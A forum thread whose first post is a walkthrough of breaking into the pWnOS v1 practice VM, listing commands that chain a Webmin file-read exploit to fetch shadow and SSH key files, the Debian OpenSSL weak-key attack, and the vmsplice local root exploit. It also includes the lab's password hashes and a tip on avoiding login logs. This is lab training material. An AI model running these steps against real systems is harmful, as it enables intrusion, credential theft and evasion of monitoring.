Results 1 to 8 of 8

Thread: [Video] Attacking - pWnOS

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Attacking - pWnOS

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3388825
    Download video: http://www.mediafire.com/?65b0nursilwfyaf
    What is this?
    This is my walk though of how I broke into pWnOS v1.
    pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points


    Scenario
    A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
    It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t.


    What do I need?
    > BackTrack 4 (Final)
    > pWnOS.vmdk
    > exploit-db.com or milw0rm.


    Software
    Name: pWnOS
    Version: 1
    Home Page: http://0dayclub.com/files/pWnOS%20v1.0.zip
    Download Link:




    Forum/Support: http://forums.heorot.net/viewforum.php?f=21


    Commands:
    Code:
    nmap 192.168.3.1-255
    
    nmap -sV -sS -O 192.168.3.100
    
    firefox http://192.168.3.100
    
    firefox http://192.168.3.100:10000
    
    
    firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
    *Webmin <> save. Filename: shadow
    
    firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
    *Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
    http://milw0rm.com/exploits/5622        (perl)
    http://milw0rm.com/exploits/5720        (python)
    http://milw0rm.com/exploits/5632        (ruby)
    http://www.exploit-db.com/exploits/5622 (perl)
    http://www.exploit-db.com/exploits/5720 (python)
    http://www.exploit-db.com/exploits/5632 (ruby)
    
    wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
    
    perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
    perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
    perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
    perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
    
    tar jxvf debian_ssh_rsa_2048_x86.tar.bz
    
    cd rsa/2048
    
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
    *scans for the public key...*
    
    ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
    exit
    
    ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
    hostname
    uname -a
    
    firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
    *Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
    http://milw0rm.com/exploits/5092         (c)
    http://www.exploit-db.com/exploits/5092  (c)
    
    nano vmsplice.c
    
    gcc vmsplice.c -o vmsplice
    
    ./vmsplice
    
    whoami
    
    
    
    ----------------------------------------------------------------------------------------------------
    Users
    root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
    vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
    obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
    osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
    yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
    ----------------------------------------------------------------------------------------------------

    Notes:

    I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!

    This is one method of getting in, the author did say that there is multiple ways in!

    It took me a bit of work to also to get it to work with virtual box & static IP addresses.
    Read my post here (short answer - need configure another interface via another OS)

    Song: Deadmau5 - Faxing Berlin
    Video length: 07:37
    Capture length: 14:55

    Blog Post: http://g0tmi1k.blogspot.com/2010/04/video-pwnos.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html#post9217 OR http://forums.heorot.net/viewtopic.php?f=21&t=391&p=1956#p1956
    Last edited by g0tmi1k; 03-05-2011 at 02:27 PM.
    Have you...g0tmi1k?

  2. #2
    Junior Member Shemsu-Hor's Avatar
    Join Date
    Aug 2009
    Posts
    93

    Default Re : [Video] Attacking - pWnOS

    Very nice ! Thanks

  3. #3
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    1

    Thumbs up Re: [Video] Attacking - pWnOS

    Thank you for all these videos.

    You have made a great job!!!

  4. #4
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    2

    Default Re: [Video] Attacking - pWnOS

    Amazing video . really liked it . Thanks for the share

  5. #5
    Just burned his ISO hitasb's Avatar
    Join Date
    Aug 2010
    Location
    Usr
    Posts
    6

    Default Re: [Video] Attacking - pWnOS

    Ow nice , good job , thanks for sharing .

  6. #6
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Attacking - pWnOS

    Quote Originally Posted by Shemsu-Hor View Post
    Very nice ! Thanks
    Quote Originally Posted by jayp75 View Post
    Thank you for all these videos.

    You have made a great job!!!
    Quote Originally Posted by D4rk357 View Post
    Amazing video . really liked it . Thanks for the share
    Quote Originally Posted by hitasb View Post
    Ow nice , good job , thanks for sharing .
    Thanks for the thanks guys!
    Have you...g0tmi1k?

Similar Threads

  1. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  2. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  3. [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM
  4. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  5. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •